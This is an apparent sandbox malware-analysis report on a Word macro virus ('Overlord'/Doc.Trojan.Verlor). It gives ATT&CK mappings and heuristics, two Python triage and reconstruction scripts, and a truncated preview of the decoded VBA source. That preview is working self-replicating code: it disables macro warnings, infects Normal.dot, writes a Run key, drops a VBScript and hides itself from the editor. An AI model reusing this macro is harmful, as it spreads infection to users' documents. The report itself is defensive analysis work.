Verdict: MALICIOUS
Risk Score: 268
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1137.001 Office Application Startup: Office Template Macros
T1547.001 Registry Run Keys / Startup Folder
T1562.001 Impair Defenses: Disable or Modify Tools
The sample carries a VBA project whose module 'Module' defines an AutoClose macro, so the code runs when the document is closed. The analyzer also flagged legacy WordBasic macro-virus markers because the project uses the classic Word command-intercept names ToolsMacro and ViewVBCode. AutoClose sets Options.VirusProtection = False to silence Word's macro warning, exports the module to 'tempad.dll' (or 'tempnt.dll') in the Windows directory and imports it into Normal.dot, or from Normal.dot back into the active document: the self-replication pattern of a Normal-template macro virus. Its infection-marker check compares a module line against the string "'MyName = Overlord", which never appears in the module, so the copy runs on every close. The Stealth routine, called whenever the user opens the VBA editor (ViewVBCode), writes the Run key 'HKCU\software\microsoft\windows\CurrentVersion\run\Overlord' with the value '%windir%\overlord.vbs' through Word's System.PrivateProfileString, and drops 'c:\windows\overlord.a.vbs', a VBScript that drives Word.Application over COM to remove the module from Normal.dot and re-import it from 'overlord.a.dll'. Note the mismatch: the Run key points at overlord.vbs, while the file written is overlord.a.vbs, so the key references a file this code never creates. ViewVBCode and ToolsMacro strip the module from Normal.dot and every open document while the editor is visible, then restore it, hiding the code from inspection. Nothing in the extracted code downloads or fetches a payload; the dropped script is a template re-infection stage, not an ingress tool transfer.
Heuristics (6)
- ClamAV: Doc.Trojan.Verlor-4 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Verlor-4
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro (the Word auto macro in this sample is named AutoClose)
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
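The summary and the heuristics above can be re-derived from the decoded macro source alone. The following Python script is an added example, not the analyzer's own code: it runs a small rule set over a constructed excerpt of the extracted macro (the SAMPLE string) and reports the indicators this report calls out: the auto-execution entry point, the command-intercept sub names that trip the WordBasic-marker heuristic, VirusProtection being switched off, VBProject Export/Import self-copying, the PrivateProfileString Run-key write and the .vbs drop. The rule IDs, severities and the ATT&CK mapping are this example's own choices, and the verdict logic is deliberately narrow: auto-exec plus self-copy is what makes a macro a virus.

```python
"""Static triage of decoded Word VBA source for macro-virus indicators.

Added example, not the analyzer's own code. SAMPLE is a constructed excerpt
of the macro extracted from this sample; rule IDs, severities and the
ATT&CK mapping are this example's own choices.
"""
import re
from dataclasses import dataclass

# Constructed excerpt of the extracted macro (see the preview in the report).
SAMPLE = r'''
Sub AutoClose()
On Error Resume Next
windir = Environ("windir")
Options.VirusProtection = False
ActiveDocument.VBProject.VBComponents("Module").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End Sub
Sub Stealth()
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "Overlord") = windir & "\overlord.vbs"
Open "c:\windows\overlord.a.vbs" For Append As #1
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Close #1
End Sub
Sub ToolsMacro()
End Sub
'''


@dataclass(frozen=True)
class Rule:
    rule_id: str
    severity: str
    attack: str    # ATT&CK technique this indicator supports, "" if none
    pattern: str   # regex applied per line, case-insensitive (VBA is)
    note: str


RULES = [
    Rule("AUTOEXEC_MACRO", "high", "T1059.005",
         r'^\s*(?:Public\s+|Private\s+)?Sub\s+(?:AutoOpen|AutoClose|AutoExec|AutoNew|AutoExit|Document_Open|Document_Close)\b',
         "Word auto macro: runs without the user invoking it"),
    Rule("COMMAND_INTERCEPT", "high", "T1564",
         r'^\s*(?:Public\s+|Private\s+)?Sub\s+(?:ToolsMacro|ViewVBCode|FileSaveAs|FileTemplates)\b',
         "Sub named after a Word menu command: intercepts inspection"),
    Rule("VIRUS_PROTECTION_OFF", "high", "T1562.001",
         r'Options\.VirusProtection\s*=\s*False',
         "Disables Word's macro warning"),
    Rule("VBPROJECT_SELF_COPY", "critical", "T1137.001",
         r'VBProject\.VBComponents(?:\(\s*"[^"]*"\s*\))?\.(?:Export|Import)\b',
         "Exports/imports its own module: Normal template infection"),
    Rule("RUN_KEY_WRITE", "high", "T1547.001",
         r'PrivateProfileString\s*\(\s*""\s*,\s*"HKEY_[^"]*\\CurrentVersion\\Run"',
         "Run key written through Word's PrivateProfileString"),
    Rule("SCRIPT_DROP", "medium", "T1059.005",
         r'Open\s+"[^"]+\.vbs"\s+For\s+(?:Append|Output)',
         "Writes a .vbs file to disk"),
    Rule("CREATEOBJECT", "medium", "", r'\bCreateObject\s*\(',
         "COM object instantiation"),
    Rule("ENVIRON", "low", "", r'\bEnviron\s*\(',
         "Environment variable access"),
]


@dataclass(frozen=True)
class Finding:
    rule_id: str
    severity: str
    attack: str
    line_no: int
    line: str


def triage(source: str) -> list:
    """Apply every rule to every line; one finding per (rule, line) hit."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for rule in RULES:
            if re.search(rule.pattern, line, re.I):
                findings.append(Finding(rule.rule_id, rule.severity,
                                        rule.attack, no, line.strip()))
    return findings


def attack_techniques(findings) -> set:
    """Distinct ATT&CK techniques supported by the findings."""
    return {f.attack for f in findings if f.attack}


def verdict(findings) -> str:
    """Auto-exec plus copying its own module is the macro-virus signature."""
    ids = {f.rule_id for f in findings}
    if {"AUTOEXEC_MACRO", "VBPROJECT_SELF_COPY"} <= ids:
        return "MALICIOUS: self-replicating macro virus"
    if ids & {"VIRUS_PROTECTION_OFF", "RUN_KEY_WRITE", "SCRIPT_DROP"}:
        return "SUSPICIOUS"
    return "CLEAN"


if __name__ == "__main__":
    hits = triage(SAMPLE)
    for f in hits:
        print(f"{f.severity:8} {f.rule_id:22} {f.attack or '-':10} L{f.line_no}: {f.line}")
    print(sorted(attack_techniques(hits)))
    print(verdict(hits))
```

Run it against the full macros.bas carved from the sample (read the file instead of SAMPLE) to get per-line evidence for each indicator; note that no rule here yields T1105, because nothing in the source fetches anything.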
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5146 bytes |

SHA-256: ee6be230de1c2202d1228627d11277f6796a166db81f321f434f857577240f55
Detection: ClamAV Doc.Trojan.Verlor-4
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module"
Sub AutoClose()
'MyName = seNse [aka overlord.a]
'WrittenBy = f0re [UC/Skamwerks/DVC]
'Version = .A (1.2)
On Error Resume Next
windir = Environ("windir")
If Dir(windir & "\tempad.dll") <> "" Then Kill (windir & "\tempad.dll")
If Dir(windir & "\tempnt.dll") <> "" Then Kill (windir & "\tempnt.dll")
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If NormalTemplate.VBProject.VBComponents.Item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
ActiveDocument.VBProject.VBComponents("Module").Export (windir & "\tempad.dll")
NormalTemplate.VBProject.VBComponents.import (windir & "\tempad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("Module").CodeModule.Lines(3, 1) <> "'MyName = Overlord" Then
NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\tempnt.dll")
ActiveDocument.VBProject.VBComponents.import (windir & "\tempnt.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
Sub Stealth()
On Error Resume Next
windir = Environ("windir")
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\software\", "RegisteredOwner") = "the Overlord"
System.PrivateProfileString("", "HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\run", "Overlord") = windir & "\overlord.vbs"
If Dir(windir & "\overlord.a.vbs") <> "" Then Kill (windir & "\overlord.a.vbs")
If Dir(windir & "\overlord.a.dll") <> "" Then Kill (windir & "\overlord.a.dll")
Open "c:\windows\overlord.a.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.remove WordObj.NormalTemplate.VBProject.VBComponents(" & Chr(34) & "Module" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\overlord.a.dll" & Chr(34) & ")"
Print #1, "WordObj.NormalTemplate.save"
Print #1, "set NT = nothing"
Print #1, "WordObj.Quit"
Close #1
NormalTemplate.VBProject.VBComponents("Module").Export (windir & "\overlord.a.dll")
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
For X = 1 To NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
Code = Code & NormalTemplate.VBProject.VBComponents("Module").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
NormalTemplate.Saved = True
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module").CodeModule.deletelines 1, Documents(X).VBProject.VBComponents("Module").CodeModule.CountOfLines
Documents(X).Saved = True
Next X
End If
Application.ShowVisualBasicEditor = True
While Application.ShowVisualBasicEditor = True
DoEvents
Wend
NormalTemplate.VBProject.VBComponents("Module").CodeModule.InsertLines 1, Code
NormalTemplate.Save
Docnumber = Application.Documents.Count
If Docnumber >= 1 Then
For X = 1 To Docnumber
Documents(X).VBProject.VBComponents("Module").CodeModule.InsertLines 1, Code
Documents(X).SaveAs Documents(X).FullName
Next X
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
For X = 1 To NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
codeNT = codeNT & NormalTemplate.VBProject.VBComponents("Module").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Module").CodeModule.deletelines 1, NormalTemplate.VBProject.VBComponents("Module").CodeModule.CountOfLines
NormalTemplate.Saved
... (truncated)
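The Stealth routine above builds the dropped VBScript line by line from string literals, Chr(34) and the windir variable, which makes the payload hard to read in the listing. The following Python script is an added example, not the analyzer's output: it evaluates those VBA string expressions and reassembles what overlord.a.vbs would contain on disk. DROPPER is a constructed excerpt of the Open/Print #1 lines shown above, and the windir value C:\WINDOWS is an assumption.

```python
"""Reconstruct the script a VBA dropper writes with Print #1.

Added example, not the analyzer's output. It evaluates the VBA string
expressions on each Print #1 line (string literals, Chr(n), the & operator
and variables such as windir) so the dropped file can be read as text.
DROPPER is a constructed excerpt of the Stealth sub in this report.
"""
import re

# Constructed excerpt of the dropper's file-writing lines.
DROPPER = r'''
Open "c:\windows\overlord.a.vbs" For Append As #1
Print #1, "On error resume next"
Print #1, "Set WordObj = CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "WordObj.Options.SaveNormalPrompt = False"
Print #1, "WordObj.NormalTemplate.VBProject.VBComponents.import (" & Chr(34) & windir & "\overlord.a.dll" & Chr(34) & ")"
Print #1, "WordObj.Quit"
Close #1
'''

# One token of a VBA string expression: literal, Chr(n), identifier or &.
TOKEN = re.compile(r'''
    \s*(?:
        "((?:[^"]|"")*)"          # string literal; "" is an escaped quote
      | Chr\(\s*(\d+)\s*\)        # Chr(n)
      | ([A-Za-z_]\w*)            # bare identifier (a variable)
      | (&)                       # concatenation operator
    )''', re.X)
OPEN_LINE = re.compile(r'^\s*Open\s+"([^"]+)"\s+For\s+\w+\s+As\s+#(\d+)', re.I)
PRINT_LINE = re.compile(r'^\s*Print\s+#(\d+)\s*,\s*(.*)$', re.I)


def eval_vba_string(expr: str, variables: dict) -> str:
    """Evaluate literals, Chr(n), variables and & into the resulting string."""
    expr = expr.strip()
    out, pos, expect_operand = [], 0, True
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            raise ValueError(f"cannot parse at: {expr[pos:]!r}")
        literal, chr_code, ident, amp = m.groups()
        if amp:
            if expect_operand:
                raise ValueError("unexpected &")
            expect_operand = True
        else:
            if not expect_operand:
                raise ValueError("missing & between operands")
            if literal is not None:
                out.append(literal.replace('""', '"'))
            elif chr_code is not None:
                out.append(chr(int(chr_code)))
            else:
                if ident not in variables:
                    raise KeyError(f"unknown variable {ident}")
                out.append(variables[ident])
            expect_operand = False
        pos = m.end()
    if expect_operand:
        raise ValueError("expression ends with &")
    return "".join(out)


def reconstruct_drops(vba: str, variables: dict) -> dict:
    """Map each file the dropper opens to the lines it prints into it."""
    handles, files = {}, {}
    for raw in vba.splitlines():
        if m := OPEN_LINE.match(raw):
            path, handle = m.group(1), m.group(2)
            handles[handle] = path
            files.setdefault(path, [])
        elif m := PRINT_LINE.match(raw):
            handle, expr = m.groups()
            files[handles[handle]].append(eval_vba_string(expr, variables))
    return files


if __name__ == "__main__":
    # windir is resolved at run time on the victim; C:\WINDOWS is assumed here.
    for path, lines in reconstruct_drops(DROPPER, {"windir": r"C:\WINDOWS"}).items():
        print(f"--- {path}")
        print("\n".join(lines))
```

The reconstructed script drives Word over COM to replace the module in Normal.dot from overlord.a.dll; it contains no URL, network call or download, so it is a re-infection stage rather than an ingress tool transfer.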